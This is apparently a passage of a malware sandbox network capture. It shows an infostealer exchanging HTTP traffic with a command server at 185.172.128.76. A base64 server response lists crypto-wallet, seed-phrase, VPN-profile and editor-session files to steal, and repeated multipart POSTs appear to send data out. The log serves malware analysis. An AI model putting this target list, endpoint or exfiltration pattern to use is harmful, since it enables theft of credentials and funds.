                                                                                                                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:29.685959101 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 265
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"files------HJJJECFIECBGDGCAAAEH--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:29.996598005 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 2052
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53
                                                                                                                                                                                                                                            Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:30.293752909 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:30.625652075 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:30.695242882 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.025537014 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.095540047 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.433486938 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.456532955 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.789980888 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:31.813849926 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.166284084 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.191792011 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.520263910 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.660110950 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.990915060 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.016860962 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.350982904 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.394237995 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.724347115 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.800632000 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.131654978 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.143610001 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCGDHJDAFHJEBFIDAFHI
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.471039057 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.520627022 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHD
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.851319075 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:34.859920025 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.188636065 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.197777987 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.529794931 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.534924984 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.863136053 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.869250059 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CGDHDHJEBGHJKFIECBGC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.197706938 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.251365900 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.582390070 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.587456942 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.917920113 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.923038006 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.257703066 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.262552977 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.588977098 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.594990015 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII
                                                                                                                                                                                                                                            Host: 185.172.128.76
